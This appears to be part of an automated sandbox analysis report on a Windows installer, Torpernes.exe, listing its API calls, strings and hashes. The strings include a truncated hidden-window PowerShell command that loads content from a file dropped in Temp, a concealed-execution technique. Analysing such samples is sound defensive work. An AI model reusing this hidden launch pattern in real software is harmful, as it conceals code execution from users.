405e19 lstrlenW call 405e3b SetWindowTextW call 401389 322->324 323->324 324->262 333 403ec7-403ec9 324->333 333->262 334 403ecf-403ed3 333->334 335 403ef2-403f06 DestroyWindow 334->335 336 403ed5-403edb 334->336 335->271 338 403f0c-403f39 CreateDialogParamW 335->338 336->267 337 403ee1-403ee7 336->337 337->262 339 403eed 337->339 338->271 340 403f3f-403f96 call 404027 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 338->340 339->267 340->267 345 403f98-403fab ShowWindow call 404073 340->345 347 403fb0 345->347 347->271
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8B
                                            • ShowWindow.USER32(?), ref: 00403BA8
                                            • DestroyWindow.USER32 ref: 00403BBC
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403BD8
                                            • GetDlgItem.USER32(?,?), ref: 00403BF9
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403C0D
                                            • IsWindowEnabled.USER32(00000000), ref: 00403C14
                                            • GetDlgItem.USER32(?,00000001), ref: 00403CC2
                                            • GetDlgItem.USER32(?,00000002), ref: 00403CCC
                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403CE6
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403D37
                                            • GetDlgItem.USER32(?,00000003), ref: 00403DDD
                                            • ShowWindow.USER32(00000000,?), ref: 00403DFE
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E10
                                            • EnableWindow.USER32(?,?), ref: 00403E2B
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E41
                                            • EnableMenuItem.USER32(00000000), ref: 00403E48
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E60
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E73
                                            • lstrlenW.KERNEL32(004226B0,?,004226B0,004281C0), ref: 00403E9C
                                            • SetWindowTextW.USER32(?,004226B0), ref: 00403EB0
                                            • ShowWindow.USER32(?,0000000A), ref: 00403FE4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 3906175533-0
                                            • Opcode ID: dc130b5ab879d2699cc5d0cd022503f708d91a6829be0c28cdee963fb22348d1
                                            • Instruction ID: 6759c50de97d02af1a732a3037a26d6f84778d3e6bb250328ac64ecb706e7fc3
                                            • Opcode Fuzzy Hash: dc130b5ab879d2699cc5d0cd022503f708d91a6829be0c28cdee963fb22348d1
                                            • Instruction Fuzzy Hash: C3C18C71A04205BBEB306F21ED85E3B3A6DFB45706F40053EF641B11E1CA79A9529B2E

                                            Control-flow Graph (rendered as an image in the report, not reproduced here): function 00402D69, whose basic blocks call GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc and SetFilePointer; executed and not-executed blocks are colour-coded in the original graph.
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D7A
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Torpernes.exe,00000400,?,?,?,00000000,00403455,?), ref: 00402D96
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Torpernes.exe,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00402DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Torpernes.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$h~A$soft
                                            • API String ID: 4283519449-1272592482
                                            • Opcode ID: be9c577222032539ca00076b9b0d13d710c4131359823756f8ef4ea21b3a53bf
                                            • Instruction ID: 9f10899fc39ddd59763a437958ebfb3d319deb30ea47bf766ee46431d43f5b69
                                            • Opcode Fuzzy Hash: be9c577222032539ca00076b9b0d13d710c4131359823756f8ef4ea21b3a53bf
                                            • Instruction Fuzzy Hash: 3E51F871940215ABDB209F65DE89BAF7AB4EB44358F14403BF904F62D1C7B88D818BAD

                                            Control-flow Graph (rendered as an image in the report, not reproduced here): function 00402FA2, whose basic blocks call GetTickCount, MulDiv, wsprintfW and WriteFile; executed and not-executed blocks are colour-coded in the original graph.
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00403003
                                            • GetTickCount.KERNEL32 ref: 00403084
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                            • wsprintfW.USER32 ref: 004030C4
                                            • WriteFile.KERNELBASE(00000000,00000000,0040FE60,7FFFFFFF,00000000), ref: 004030F3
                                            Strings
                                            • damebladets skips modeskaber trillingfdslers tilgodeskrevnelysforhold strofernes mbelfabrikants.forhoret straahattes almuemblernes,relaterede deratized overslight,tailordom faggoty allene unhushed nonavoidableness reallottingeufomaniens taletidens media., xrefs: 00402FCC
                                            • ... %d%%, xrefs: 004030BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%$damebladets skips modeskaber trillingfdslers tilgodeskrevnelysforhold strofernes mbelfabrikants.forhoret straahattes almuemblernes,relaterede deratized overslight,tailordom faggoty allene unhushed nonavoidableness reallottingeufomaniens taletidens media.
                                            • API String ID: 4209647438-2598664323
                                            • Opcode ID: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction ID: cf63611a73504a8a14adbad67728b55c0939cb45f31c124ce58839b51082c780
                                            • Opcode Fuzzy Hash: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction Fuzzy Hash: AE517F3190021AABCF10DF65D944A9F7BACEF08756F10413BE911BB2C1D7389E51CBA9

                                            Control-flow Graph (rendered as an image in the report, not reproduced here): function 00401752, whose basic blocks call lstrcatW, CompareFileTime, SetFileTime and FindCloseChangeNotification; executed and not-executed blocks are colour-coded in the original graph.
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                            • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan,"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan,00000000,00000000,"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems,?,?,00000031), ref: 004017B8
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems$skdeskindene
                                            • API String ID: 1941528284-4228974200
                                            • Opcode ID: f77b84e7394a9015f11e648b34cc823c09b6249128fc9dd50b1177973a1be591
                                            • Instruction ID: fea904f2e10d271746d0f20908cdf77902a72bdc4a53de11320a400de1336617
                                            • Opcode Fuzzy Hash: f77b84e7394a9015f11e648b34cc823c09b6249128fc9dd50b1177973a1be591
                                            • Instruction Fuzzy Hash: 62417271900514BACF11BBB5CC46DEF7679EF05368F20823BF425B11E2D63C8A519AAE

                                            Control-flow Graph (rendered as an image in the report, not reproduced here): function 004050C1, whose basic blocks call lstrlenW, lstrcatW, SetWindowTextW and SendMessageW (three calls); executed and not-executed blocks are colour-coded in the original graph.
                                            APIs
                                            • lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                            • lstrlenW.KERNEL32(004030DB,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                            • lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,004030DB), ref: 0040511C
                                            • SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri), ref: 0040512E
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri
                                            • API String ID: 2531174081-3536308614
                                            • Opcode ID: 2c58d8ae54bcf29ffa93457a9e6d5bbc16706858763a02d48861774ffb4989ea
                                            • Instruction ID: a155edcc61f39e61e19764dfe73df8d96dc604efb0d9904bed2a7f1a8b5b6fb0
                                            • Opcode Fuzzy Hash: 2c58d8ae54bcf29ffa93457a9e6d5bbc16706858763a02d48861774ffb4989ea
                                            • Instruction Fuzzy Hash: 96217C71D00558BBCB219FA5DD45ADFBFB9EF44350F10806AF944A62A0C6794A418F98

                                            Control-flow Graph (rendered as an image in the report, not reproduced here): function 004015B9, whose basic blocks call CreateDirectoryW, GetLastError, GetFileAttributesW and SetCurrentDirectoryW; executed and not-executed blocks are colour-coded in the original graph.
                                            APIs
                                              • Part of subcall function 0040590F: CharNextW.USER32(?,?,00424EB8,?,00405983,00424EB8,00424EB8,?,?,74DF3420,004056C1,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 0040591D
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 00405922
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 0040593A
                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems,?,00000000,000000F0), ref: 00401630
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems, xrefs: 00401623
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                            • String ID: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems
                                            • API String ID: 3751793516-1539819606
                                            • Opcode ID: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction ID: 262734717bc3bcf7a8c0ce33bb30a7f580439ac1f26dac51a327500c395ab635
                                            • Opcode Fuzzy Hash: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction Fuzzy Hash: 5411C671904104EBCF206FA0CD449AE77B1FF14369B34453BF881B61E1D23D49419A5D

                                            Control-flow Graph (rendered as an image in the report, not reproduced here): function 00405AB4, whose basic blocks call GetTickCount and GetTempFileNameW in a retry loop; executed and not-executed blocks are colour-coded in the original graph.
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405AD2
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031FD,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405AED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-678247507
                                            • Opcode ID: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction ID: 8be7c4eca50f53f96d3bf9dd8d425998f061e8a75984e32c23608a8539937739
                                            • Opcode Fuzzy Hash: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction Fuzzy Hash: C0F09076B00204BBDB00CF5ADC45E9FBBBCEB95710F10803AEA00E7191E2B0AE40CB64

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 715 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 722 4029c7-4029d6 715->722 723 40237d-402385 715->723 724 402387-402394 call 402b3a lstrlenW 723->724 725 402398-40239b 723->725 724->725 729 4023ab-4023ae 725->729 730 40239d-4023aa call 402b1d 725->730 733 4023b0-4023ba call 402fa2 729->733 734 4023bf-4023d3 RegSetValueExW 729->734 730->729 733->734 736 4023d5 734->736 737 4023d8-4024b2 RegCloseKey 734->737 736->737 737->722 740 402793-40279a 737->740 740->722
                                            APIs
                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                            • lstrlenW.KERNEL32(0040A568,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: 73d0cf6344bb069a5e851f313c44845f1cd89e4b55743e98affba83dcd389783
                                            • Instruction ID: dd6482d33bfca26aaa8e7f30057c56ab8fb8c99c6207a432b960756be4260044
                                            • Opcode Fuzzy Hash: 73d0cf6344bb069a5e851f313c44845f1cd89e4b55743e98affba83dcd389783
                                            • Instruction Fuzzy Hash: 441193B1A00108BEEB10EFA0DD49EAF777CEB50398F10403AF505B71D0D6B85D419B69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 741 401e51-401e62 call 402b3a call 4050c1 call 405590 747 401e67-401e6c 741->747 748 401e72-401e75 747->748 749 402793-40279a 747->749 751 401ec6-401ecf CloseHandle 748->751 752 401e77-401e87 WaitForSingleObject 748->752 750 4029c7-4029d6 749->750 751->750 753 401e97-401e99 752->753 756 401e89-401e95 call 4061bc WaitForSingleObject 753->756 757 401e9b-401eab GetExitCodeProcess 753->757 756->753 758 401eba-401ebd 757->758 759 401ead-401eb8 call 405d60 757->759 758->751 763 401ebf 758->763 759->751 763->751
                                            APIs
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                              • Part of subcall function 00405590: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                              • Part of subcall function 00405590: CloseHandle.KERNEL32(?), ref: 004055C6
                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 3585118688-0
                                            • Opcode ID: ae2cac8f4d04818200e188493c9ec3520e52d8428438fa66b1f9dd597007ba5f
                                            • Instruction ID: 80c30345ee18bbc14dd8b48d6273e75b475bc77ebba3550ac4fd2fc2a9fefb5a
                                            • Opcode Fuzzy Hash: ae2cac8f4d04818200e188493c9ec3520e52d8428438fa66b1f9dd597007ba5f
                                            • Instruction Fuzzy Hash: 5A115E71910204EBCF109FA0CD859DE7AB5EB04355F24447BE501B62E1D2794992DB99
                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                            • CloseHandle.KERNEL32(?), ref: 004055C6
                                            Strings
                                            • Error launching installer, xrefs: 004055A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction ID: be1e6bbd108630f976ef7f5fcce94dc376a16e18e8587d411be4a41be08dbb4f
                                            • Opcode Fuzzy Hash: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction Fuzzy Hash: 46E0B6B4A05209BFEB109B64EC49F7B7BBDEB00704F908521BD15F2290D674A9148A79
                                            APIs
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406110
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406124
                                              • Part of subcall function 004060AD: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406137
                                            • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 004031EC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Char$Next$CreateDirectoryPrev
                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 4115351271-517883005
                                            • Opcode ID: 3d998d15709ba1c8c7012b8d63c2b0775907459dc3a3b7907f04902c8abed42a
                                            • Instruction ID: 8b2d002bf29f08ae4a69d67461cf3cd98a6fdd65923c287cde6dfba4ee08c55e
                                            • Opcode Fuzzy Hash: 3d998d15709ba1c8c7012b8d63c2b0775907459dc3a3b7907f04902c8abed42a
                                            • Instruction Fuzzy Hash: D3D0C92254793131D95176263D06FCF194C8F0A35AF268477F805B91C2DB6C1A9289FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction ID: f28e3593fe72fa88d01303aa629bfae6551304820caee053d49813df3e18db6a
                                            • Opcode Fuzzy Hash: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction Fuzzy Hash: C8A13371E00228CBEB28CFA8C8547ADBBB1FF44305F11816ED856BB281D7785A96DF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction ID: 40010b11bd5e1f261aed15f7e9cc202cac7d7d8c55991c62282cde7851584d9c
                                            • Opcode Fuzzy Hash: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction Fuzzy Hash: 56911070E00228CBEF28CF98C8547ADBBB1FF44305F15816AD856BB291D7786A96DF44
                                            Memory Dump Source
